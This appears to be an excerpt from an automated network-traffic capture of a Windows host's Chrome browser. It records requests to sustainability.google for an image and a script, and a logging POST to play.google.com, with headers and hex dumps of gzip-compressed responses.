                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC711INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: 81d67e53153e56af5fdc7f04bf78fa5b
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:32:58 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:42:58 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          Age: 534
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: image/svg+xml
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC697INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 9b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 4b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6f 0d 0a 30 30 30 30 30 31 0d 0a e3 0d 0a 30 66 66 31 0d 0a 46 12 c7 bf 0a e1 bd 9a 1c 76 f3 bd c8 04 48 84 5d e8 20 9f 06 d0 61 6e 1a 59 b6 84 a5 25 41 92 e5 c4 9f 7e 7f ff 6a 52 96 9d 91 39 bb c1 2e 90 64 c6 63 76 b3 1f d5 d5
                                                                                                                                                                                                                                                                                          Data Ascii: 00000001000000010000000100000001000000010000000100000001000000010000000100000001000000010000000100000001K00000001o0000010ff1FvH] anY%A~jR9.dcv
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: 3c f6 4b 7f e4 dd 27 69 15 57 49 85 ae 49 9a a4 f1 23 97 25 79 c1 e0 04 4d a4 73 98 f0 42 59 d8 a4 a4 98 a7 28 07 04 a9 88 39 36 a8 25 57 51 e1 5c bb c4 e7 f4 f8 72 9e 64 55 9c 64 a5 ce 79 52 5b 61 92 6f f3 58 23 f6 fa d9 c7 3e 52 3d f2 e3 1a 90 3e f1 02 56 35 71 1e e5 71 be 47 00 79 89 78 99 a7 51 52 d7 02 48 53 49 a5 c9 22 46 17 17 19 fe b0 58 3f 0e 71 84 fd d4 4b 57 43 84 71 26 22 a4 71 f1 fa b5 92 5e a8 a7 e5 38 bb bc 0e 1a 36 3e 2e 76 83 26 04 ba d7 73 08 25 6b 06 fa 3c d8 7d 4f 87 13 19 a0 86 f1 54 d8 44 7e 2e 22 47 d0 a5 23 d2 be ef 3d 81 38 41 d0 f8 f2 3f 19 7f 49 a3 de ee 56 c7 45 bc bd bd 1b a2 1e a7 c4 25 10 ec 18 a3 d3 8f ee f9 c6 35 51 36 2e de e2 70 74 62 9e 84 a5 db d9 92 86 d7 74 98 76 e2 74 b6 99 b8 41 e0 b0 83 c6 f7 2c 4e 4a 56 4b 0a c8
                                                                                                                                                                                                                                                                                          Data Ascii: <K'iWII#%yMsBY(96%WQ\rdUdyR[aoX#>R=>V5qqGyxQRHSI"FX?qKWCq&"q^86>.v&s%k<}OTD~."G#=8A?IVE%5Q6.ptbtvtA,NJVK
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC1408INData Raw: a2 d9 09 07 4c 2a 09 47 36 ca f6 d8 57 d5 62 ea fd 20 c4 02 6f 23 52 a0 86 da 25 aa 25 e6 52 90 66 21 33 c6 14 de 8c 2b 19 66 c1 8a 71 10 80 40 91 ed 43 45 c0 96 f9 b4 d2 98 00 0a 9f 39 00 88 8a 7d 80 a9 38 19 8f fa 55 9a e6 94 a9 83 7b 6e 59 e3 af d7 17 2d f0 76 b3 3f c4 5f da cd fd fd 62 37 64 84 75 30 5f 1c 09 2c 15 86 16 9c f1 55 fc 84 f3 96 0e fa 13 44 23 8c 77 e7 fe 04 d6 e8 e8 14 06 14 88 36 52 a0 9f bd 8b ba 7a e7 80 97 a5 48 83 73 2a e2 8e 1b a3 98 dc 38 a3 58 2e 8a 4d 15 c2 42 47 24 51 7e 15 c3 44 3a 71 49 0c 30 2e 31 3d ca 14 9c e0 47 a6 ac b4 44 35 e3 a7 89 8b 60 a4 b5 63 47 54 48 58 4d 25 76 0a 42 f0 f6 6d 00 7e a2 b5 83 5a 87 58 a4 98 8b f3 08 36 49 43 dc 75 71 d8 98 88 eb f2 22 ef b3 e5 6e 36 5f 7c d9 6c 06 e5 12 a7 46 71 07 14 e0 1c 28 ef
                                                                                                                                                                                                                                                                                          Data Ascii: L*G6Wb o#R%%Rf!3+fq@CE9}8U{nY-v?_b7du0_,UD#w6RzHs*8X.MBG$Q~D:qI0.1=GD5`cGTHXM%vBm~ZX6ICuq"n6_|lFq(
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC769INData Raw: af ce 6a 9c 30 a5 6c 35 53 10 34 db 1e 9a 6d 43 2f e2 ba 6d 67 bf c6 f3 d5 6e ce 07 72 e9 d6 f7 b5 af 51 18 87 f5 f7 5d 7d 21 49 41 d6 b8 38 c6 0d 18 53 61 c7 3c 2f a2 b8 5f cc 76 f3 e5 70 5a 12 07 95 cd ea 02 59 95 d9 43 d9 f4 82 38 1f 17 1a ea 98 9f 0e 51 09 e1 93 e2 27 08 6f 9f 6f 71 df f1 ad 69 a1 83 b4 07 54 27 bd 49 d6 44 41 03 61 87 d2 27 3e 27 f1 a1 0f 00 c0 0f 4f d7 3c df c8 c4 15 a3 02 57 1d 9f dc 1e d6 12 15 9f c8 08 da 3b a5 c1 c5 b7 06 b1 ee 85 04 b0 6e 6d d0 62 c3 2f 6e fa 7e b3 b9 87 25 f3 4d bb d9 c5 24 66 37 6f f6 4f 40 f4 72 1f b3 33 8a b9 af 8b 7f e6 c1 97 e2 83 b1 be f4 b9 46 89 b9 72 49 62 84 c8 50 a1 05 41 1d 0e 3e 01 47 17 2f 28 71 a1 64 2c 37 84 6a 05 0a 90 8a 08 19 7e 28 24 51 ce 8f ef f1 29 e1 9f 5d 34 6a 7c a8 41 bd 9c d4 73 9d
                                                                                                                                                                                                                                                                                          Data Ascii: j0l5S4mC/mgnrQ]}!IA8Sa</_vpZYC8Q'ooqiT'IDAa'>'O<W;nmb/n~%M$f7oO@r3FrIbPA>G/(qd,7j~($Q)]4j|As
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC726INData Raw: 30 30 30 30 30 30 30 31 0d 0a fa 0d 0a 30 30 30 30 30 30 30 31 0d 0a 6e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 67 0d 0a 30 30 30 30 30 30 30 31 0d 0a 35 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 30 30 30 30 30 30 31 0d 0a ec 0d 0a 30 30 30 30 30 30 30 31 0d 0a 93 0d 0a 30 30 30 30 30 30 30 31 0d 0a d0 0d 0a 30 31 0d 0a 87 0d 0a 32 36 30 0d 0a 93 2f a1 37 09 b3 0c b5 7d 90 42 e1 01 b2 cc d0 67 75 0e a8 02 b9 95 4a d4 5a ca cb 94 dc e8 90 31 47 ca 19 26 14 ad a2 fb 37 ae 26 33 ca 25 22 dd 28 42 b4 98 c5 30 69 25 a9 42 8f 23 41 be ca f2 4b 7c c9 60 a2 dd 3d c2 2a 22 f5 92 3f f2 e6 aa 9d 91 ec f5 cd fc ce f8 ec 37 ed 8a 0b f3 03 c6 47 3e c1 77 6b 03 e9 31 2b 83 d6 e6 01 e9 ab 60 e5 9f d2 98 3c 78 22 7e fe 4c 02 99 fc 6e 2b fe 5f b6 e2 e6 cf 6c 0a 6e be aa
                                                                                                                                                                                                                                                                                          Data Ascii: 0000000100000001n00000001g0000000150000000100000001000000010000000101260/7}BguJZ1G&7&3%"(B0i%B#AK|`=*"?7G>wk1+`<x"~Ln+_ln
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:52 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          130192.168.2.750009216.239.38.214435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC378OUTGET /static/index.min.js?cache=47ade0f HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: sustainability.google
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC713INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Content-Security-Policy: base-uri 'none'; object-src 'none'; script-src 'self' 'unsafe-inline' *.google.com *.google-analytics.com *.googleapis.com *.googletagmanager.com *.gstatic.com *.youtube.com *.ytimg.com;
                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=2592000; includeSubdomains
                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                          X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                          X-Cloud-Trace-Context: f8dd4fb398665b3b6f5927986397c322
                                                                                                                                                                                                                                                                                          Content-Encoding: gzip
                                                                                                                                                                                                                                                                                          Server: Google Frontend
                                                                                                                                                                                                                                                                                          Date: Fri, 27 Sep 2024 14:36:03 GMT
                                                                                                                                                                                                                                                                                          Expires: Fri, 27 Sep 2024 14:46:03 GMT
                                                                                                                                                                                                                                                                                          Cache-Control: public, max-age=600
                                                                                                                                                                                                                                                                                          Age: 350
                                                                                                                                                                                                                                                                                          ETag: "_dVh2w"
                                                                                                                                                                                                                                                                                          Content-Type: text/javascript
                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC695INData Raw: 30 30 30 30 30 30 30 31 0d 0a 1f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 8b 0d 0a 30 30 30 30 30 30 30 31 0d 0a 08 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 00 0d 0a 30 30 30 30 30 30 30 31 0d 0a 02 0d 0a 30 30 30 30 30 30 30 31 0d 0a ff 0d 0a 30 30 30 30 30 66 66 36 0d 0a bc 7d 69 7b 5a c7 96 ee 77 fd 0a 4c 9f 56 e0 68 0b 4b 76 ce e9 34 98 e8 41 08 d9 24 92 50 04 4a e2 ab f6 c3 dd c0 46 10 31 19 90 6d 45 d6 7f bf ef 1a 6a d8 03 92 9c 73 fa f6 e0 88 da 35 ae 5a b5 e6 5a 55 18 de ce fa eb f1 7c 56 e8 76 3f 2f fa fd e2 fd 77 b7 ab 28 b7 5a 2f c7 fd f5 77 15 29 2c 45 55 f3 c7 d7 af f7 0f b6 b4 b4 ea cf 17 51 d5 2f
                                                                                                                                                                                                                                                                                          Data Ascii: 0000000100000001000000010000000100000001000000010000000100000001000000010000000100000ff6}i{ZwLVhKv4A$PJF1mEjs5ZZU|Vv?/w(Z/w),EUQ/
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: dd 83 d8 af b2 a9 0d 20 df 9b bf 73 bd 42 f1 fe a1 57 5a 2c e7 eb 39 61 6d 35 34 18 30 8b 3e e7 7a 1e 16 08 76 9f 2f 41 66 96 eb bb 6f 9d 51 ac f5 38 5a 99 b9 c5 ca ef bc 39 06 bd 00 14 70 3c 2c 84 d5 2a a3 93 9b e3 d7 af 28 d3 b5 d9 89 17 0d 1e 56 40 15 3e 54 fb 82 cf 66 31 20 6c 6e 67 af a3 f5 db c9 bc 17 c6 e9 50 58 bd ca 0b cc 1d 38 af b9 5a 67 34 5e 6d 6f bb bf 83 30 48 d5 fc 3c 9e 0d e6 9f b7 b7 e5 bf e9 ef ab 68 32 dc de a6 7f d3 df a4 67 33 c2 87 8a 3d b5 a0 8a 8e f8 55 76 76 40 66 e9 34 f7 ab b4 c4 0a 60 d3 df de ee 97 4e c3 f5 a8 5a a5 7f 0d 0c fa 0f eb d1 72 fe 39 d7 58 2e 41 00 f2 f5 70 36 9b af 73 20 4e 83 9c 8c 95 d3 85 16 2b de 06 cb 27 b7 b1 16 4c 85 35 00 50 74 e7 af d9 ee b6 df 9f 1e b6 4e f4 fc 55 7d 44 34 98 68 68 5f 7e c5 44 10 30 8d
                                                                                                                                                                                                                                                                                          Data Ascii: sBWZ,9am540>zv/AfoQ8Z9p<,*(V@>Tf1 lngPX8Zg4^mo0H<h2g3=Uvv@f4`NZr9X.Ap6s N+'L5PtNU}D4hh_~D0
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: 76 ba e8 cc 99 3a bc 83 84 32 89 96 e9 7e fd 0d e1 81 62 90 ff fa 95 cb 12 5b f4 cc 85 50 d7 de 80 50 dd b9 33 46 1b 45 8d 84 6e ab 47 c6 20 a1 b7 4d 4c f0 32 3a 4b 6f fe 7d f4 a5 1f 2d 08 11 ca 61 30 5e 35 ec 2f da 00 9e 40 06 58 0a be 42 f2 18 48 85 98 ba d3 61 16 95 31 0f a9 5a c6 12 79 d4 14 a0 ff 1a 50 79 f2 d0 90 6f af 47 c7 72 70 0e 27 f3 fe 8d 4f c4 15 ce 19 53 92 95 ff bb a7 c4 1b ea 81 84 38 58 6a c9 c6 ba 2a 72 02 a6 f0 dc 03 6a a8 4c 62 80 d0 b1 ec 84 15 8e 45 33 d8 19 d4 58 98 75 e8 1e a5 bd 90 18 d8 3e c1 46 46 1c 7d 10 3f 1f 65 d5 3a 13 64 ac 90 f9 95 b2 5b d7 2e 46 21 43 69 c7 1d 16 4c 57 bd e7 62 9f ec 9f 07 89 0c 40 fb 76 f0 c7 30 59 4f c1 6c e0 ba cb e8 0d 67 26 8b 79 65 50 2d a8 01 24 6f 6d 42 4a 8b 14 31 fa 02 29 41 b8 03 ab d4 6c ac
                                                                                                                                                                                                                                                                                          Data Ascii: v:2~b[PP3FEnG ML2:Ko}-a0^5/@XBHa1ZyPyoGrp'OS8Xj*rjLbE3Xu>FF}?e:d[.F!CiLWb@v0YOlg&yeP-$omBJ1)Al
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC717INData Raw: e0 6c f8 db 8a 83 83 fe 36 1e 74 ab 23 87 1a 31 3f d4 1d b3 bc 20 3f 50 7f 13 8c d2 f9 e7 38 d9 6f 70 98 e3 9b 8b 50 47 e3 2a 2e ad e7 6d c4 d5 ce bc 58 58 b3 1f 22 1c a5 27 f8 c0 32 d5 a0 9a 97 a9 77 65 ea 58 67 21 33 84 81 61 10 0c 5d 60 6b 2f 81 af 8e ac 26 f7 cd 06 8a c6 37 30 be 98 b0 2a 1b 53 d0 0d 72 8d 5c 1c 4f af 9a e7 d0 b9 5c 73 b6 fe 41 fe ba 1c c7 ff 84 ff 6d ba 88 06 b6 da fe 3f 5d 3d f3 37 5a bf 7e e5 8a cd df c7 93 79 68 3f f0 8f 7f 7e cf b5 f2 26 a6 28 97 2f 22 f0 74 af d2 87 81 44 f5 e5 be 89 7d 19 b8 93 24 31 1a 57 e4 16 fc 50 c9 8a 25 83 6b d1 15 bf 30 71 64 03 b7 9d 88 30 f2 18 5b 02 7d bc 7a cf 0b 2b 32 27 05 f1 12 49 92 3e d6 10 5e 90 64 89 39 70 11 13 61 32 ca 99 f1 16 74 13 78 a8 dd 84 0f c1 56 36 31 4c f5 1b 23 f6 f0 d7 13 83 22
                                                                                                                                                                                                                                                                                          Data Ascii: l6t#1? ?P8opPG*.mXX"'2weXg!3a]`k/&70*Sr\O\sAm?]=7Z~yh?~&(/"tD}$1WP%k0qd0[}z+2'I>^d9pa2txV61L#"
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: 30 30 30 30 30 30 30 31 0d 0a 5f 0d 0a 30 30 30 30 30 30 30 31 0d 0a 69 0d 0a 30 30 30 30 30 30 30 31 0d 0a 1e 0d 0a 30 30 30 30 30 30 30 31 0d 0a 3a 0d 0a 30 30 30 30 34 66 66 63 0d 0a 60 72 52 be 11 75 59 7f 76 e6 dd 62 20 34 c4 7d 21 8a d2 45 4f b1 19 bb 06 6e 92 82 d5 37 74 2c 81 d3 62 95 96 ce 44 7c 76 41 44 f9 9a 51 5b 72 7d 09 bd d6 fe 72 eb 79 0e b1 42 08 02 c7 89 aa b0 a7 13 07 25 4e 84 a4 63 e0 2a 28 6a 3b 9c 46 b5 95 1e f7 2e 08 11 b7 41 ec d6 ea f3 98 c2 b2 28 bc 08 b7 2d 30 b3 7e 88 28 1f 13 94 5e 16 a8 d0 ee be a8 de 54 7a a0 b0 37 b9 b0 22 75 0c 50 f3 e5 59 75 eb 05 02 cc f5 2b 98 66 08 d2 8e 52 08 a4 33 71 31 59 30 9c cd 29 ec 87 f4 3d 44 cd d0 44 d4 a5 74 3b a1 f0 6a 2a d8 04 c0 78 cb 18 34 65 96 26 b0 05 e8 3b ab de b0 5a e6 e8 3b 63 ab
                                                                                                                                                                                                                                                                                          Data Ascii: 00000001_00000001i0000000100000001:00004ffc`rRuYvb 4}!EOn7t,bD|vADQ[r}ryB%Nc*(j;F.A(-0~(^Tz7"uPYu+fR3q1Y0)=DDt;j*x4e&;Z;c
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: 22 be 61 e6 d4 c2 72 66 ec 0e 64 d0 2f 4c 77 f8 56 b2 bd d9 b7 b3 5f f4 6c 4d 84 53 a8 be 89 94 2d 9c 19 7b 8d c4 05 1e 0d 13 a2 56 5c 57 95 94 89 0f 1d b2 4b 61 8d e0 c0 60 7d b5 0f e4 7b b0 93 22 6b 20 86 7a 01 7c 7a a1 7b be 8a c2 89 11 82 71 81 02 3c 9a f0 62 61 50 82 3e 17 70 55 0e b4 d4 6b c0 25 c2 a8 c3 c2 d5 d5 22 78 f5 21 b8 5a 07 af 3f 40 e2 42 ff af 5e 54 3f 96 80 28 58 d3 d7 af af cd 0f f0 65 41 14 48 fa 1f 4b 83 08 b7 2b 22 d4 c0 df 3c df e0 7b 8b 2a 1f 89 40 e0 d3 f6 f6 f7 55 ed c9 5a 3a eb 86 aa 10 e2 d8 85 0d b0 30 f7 8b 81 49 cb 00 5c c4 2c b0 50 89 c0 98 05 48 03 30 77 6f ab 8b 78 fa 80 ea da f5 34 a2 6d 21 88 d9 03 46 54 ae b0 08 b6 66 aa 54 ad 59 5c 19 b8 73 9d b0 b8 2f 82 59 00 90 52 8a 8e 35 18 8a eb 9a ad 3b b1 ae 53 b7 a3 45 ce 33
                                                                                                                                                                                                                                                                                          Data Ascii: "arfd/LwV_lMS-{V\WKa`}{"k z|z{q<baP>pUk%"x!Z?@B^T?(XeAHK+"<{*@UZ:0I\,PH0wox4m!FTfTY\s/YR5;SE3
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: 38 75 dd 88 5d 94 6f 8f 03 b2 dc 62 24 39 85 af 33 49 18 1c 59 6e 76 20 b5 88 2a 81 98 ad 60 00 3f 30 c2 d7 24 f0 c8 ee aa 28 86 b0 74 c0 76 a4 b2 88 08 81 a3 2a 4c 47 3a b5 7b 21 35 88 33 0c 42 e4 37 c2 75 84 39 67 6d 7c 40 3a 23 78 9c 65 fe 1b c4 31 20 47 06 34 4c 30 88 c1 a9 dc d0 0a ab f8 cb 32 07 67 5e e2 65 7b 30 24 2c 8b 1b 2d 14 8a 14 a3 ea ad 4e 4b 6d 8f 29 50 26 b0 dc d9 fb 28 17 d5 c6 1d 71 13 b3 7a e9 d3 b3 e1 04 78 3a a1 1e 38 4c ff 00 4e e2 2a 2e 41 ee bf a4 9f fb 2f fb 9c 76 09 69 b4 fa 28 47 8e 1b 17 38 ba 21 d0 36 09 95 f1 ac 3f b9 45 5c e5 33 e7 42 8c 71 20 96 76 f2 2f db c0 29 8b 42 83 aa fc 09 5b a1 20 12 dd 40 d1 98 17 a4 07 a3 cb b4 74 90 f6 7e a4 54 51 7d 31 0e 4d c3 2f 85 fe ce 10 11 36 45 18 24 87 15 6b 81 1c c1 8c 28 96 47 64 b7
                                                                                                                                                                                                                                                                                          Data Ascii: 8u]ob$93IYnv *`?0$(tv*LG:{!53B7u9gm|@:#xe1 G4L02g^e{0$,-NKm)P&(qzx:8LN*.A/vi(G8!6?E\3Bq v/)B[ @t~TQ}1M/6E$k(Gd
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: eb 00 10 a1 17 b7 30 f3 06 5b 94 a4 2b fd 39 c4 27 12 24 d2 5f 28 31 61 88 a8 47 54 40 32 e7 8c 0a 08 4f c7 01 c1 67 08 1b 19 9f 05 d9 f0 f9 26 f3 f3 78 88 9b aa f0 59 22 6a 35 a3 f5 77 57 4b 84 de 56 f3 da 09 72 14 cf d7 05 5e 0a a2 84 f0 27 1e 3d a0 ff 98 39 ca 2f 99 90 fc 2d 0d e5 6f 19 aa f8 1d c8 6a f6 58 c8 16 cd 0e 8e 6a 7e 2f 2f 43 25 86 d7 7e 08 94 f2 e7 5f 1c 5f b6 fc ea 03 dd 60 85 fd da 59 ab 43 ba 13 66 9f 3d 40 2c 3a 76 db 65 11 4e 7f ed 3f fa d5 cf 4d 9c 6e 3b 04 32 58 86 9a fe 8c c4 0d 8f 7c 45 e0 d8 23 5f 67 8f 7e a5 d0 c6 60 1a 47 5c 3e a4 64 85 35 dc e6 33 63 fb 72 c5 ce 0f b8 23 85 2a 7c 0e 27 7a 45 83 ea a2 9b 5b 47 05 c0 8b 04 fd a9 2f 6c b1 3d a6 e1 c1 d5 87 b2 66 0e fa b4 b8 5c a0 69 f4 4e 52 33 ba d6 d0 b6 e0 99 a3 7c 8d bf 8e a3
                                                                                                                                                                                                                                                                                          Data Ascii: 0[+9'$_(1aGT@2Og&xY"j5wWKVr^'=9/-ojXj~//C%~__`YCf=@,:veN?Mn;2X|E#_g~`G\>d53cr#*|'zE[G/l=f\iNR3|
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: 86 b6 7d 52 0d c3 6b 13 d3 bb d9 d4 f4 09 96 a6 c6 6f e7 ad 8b 8e 09 88 8b 9f ee 27 1a 9f 34 db f1 86 fa 28 1a b9 c1 44 2f 48 52 8b d8 14 d8 66 00 83 d7 d6 a7 52 b3 d3 38 85 ac c6 c4 5d da 20 87 d3 86 de b4 da 2c 21 c9 6e b0 be 7c 2a 9d d5 7e 6d be 65 91 5f 5b 12 73 80 f4 f3 c4 e2 54 cc 62 a1 49 26 46 ce b0 67 b7 63 f1 4c da 29 5f 35 71 77 72 6f c4 3c 6f 91 f9 0b 77 41 3e 23 30 9f 2f bf af 8a 70 2c 8b a2 03 4a 76 04 b9 aa b6 5e 2f 57 24 da 32 b8 e6 bd 55 b4 44 8a 59 56 62 a7 61 e1 5e 05 eb 36 6d a5 44 5c 59 c6 ee 09 d5 30 fc 72 73 38 63 17 88 dc 46 5a 8d d3 39 88 2e de f7 e0 62 c5 b8 03 72 3a df ca fb 22 b2 39 c8 a7 47 39 64 b5 ed 35 99 a2 84 4d 62 46 0f c1 22 ae 71 ab d9 49 a5 42 ca c6 07 5b 1d a8 70 7e 01 3f ce 16 22 3b d0 e4 a3 df 44 93 49 23 6e 63 7f
                                                                                                                                                                                                                                                                                          Data Ascii: }Rko'4(D/HRfR8] ,!n|*~me_[sTbI&FgcL)_5qwro<owA>#0/p,Jv^/W$2UDYVba^6mD\Y0rs8cFZ9.br:"9G9d5MbF"qIB[p~?";DI#nc
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:53 UTC1408INData Raw: 8c 69 55 35 6d fc a8 27 e7 22 8e 5d 3b d3 58 4a 10 cb 15 9c 0d e4 bd 47 6e 2d be 79 57 79 31 93 bb 77 ae 08 99 18 91 33 83 23 a1 2b 3c e5 9e 4c 7f 6a d2 82 d2 5a 16 d5 1e 6e d1 92 64 e0 6e 4f 9a e0 a8 85 5c 69 84 15 2b b7 a0 d8 ab 05 ae 30 d2 a5 40 9b 8e ae f7 30 95 d9 cf ae 91 58 c1 36 db de de 7b b3 50 63 d9 c1 8b 3d ba 6e 83 d6 53 4f 55 a1 31 f5 be a4 f5 67 c7 16 3a a4 0a b8 83 67 2e 16 56 5e 2c 64 79 ae 88 72 12 e8 2d 43 26 c3 6b 5e 09 ee c9 61 73 fa 07 1f 61 a6 e7 2b 1d b2 4f d0 a2 67 b8 34 5a 4e 2f 92 ae ad e3 66 08 ee ac 8b 7c 44 97 c4 70 67 1d 00 d3 a4 7b 0f 72 3d 9c 0b 08 4c ba c3 a8 e6 f6 10 da 17 09 9b 48 8e ac 79 fa 70 99 1e 81 68 30 41 52 74 30 92 97 db c0 d4 c1 43 f0 ce c7 3b 43 83 38 f7 4e 73 1d 4d 57 55 4b f2 25 2c 25 1a 48 b1 61 04 d0 9a
                                                                                                                                                                                                                                                                                          Data Ascii: iU5m'"];XJGn-yWy1w3#+<LjZndnO\i+0@0X6{Pc=nSOU1g:g.V^,dyr-C&k^asa+Og4ZN/f|Dpg{r=LHyph0ARt0C;C8NsMWUK%,%Ha


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          131192.168.2.750023142.250.185.1424435916C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          2024-09-27 14:41:54 UTC1085OUTPOST /log?hasfast=true&authuser=0&format=json HTTP/1.1
                                                                                                                                                                                                                                                                                          Host: play.google.com
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Content-Length: 1068
                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                          Content-Type: text/plain;charset=UTF-8
                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                          Origin: https://ogs.google.com
                                                                                                                                                                                                                                                                                          X-Client-Data: CI62yQEIpLbJAQipncoBCNrwygEIlaHLAQiFoM0BCNy9zQEIucrNAQii0c0BCIrTzQEIpNbNAQj01s0BCKfYzQEI+cDUFRj1yc0BGOuNpRc=
                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                          Referer: https://ogs.google.com/
                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
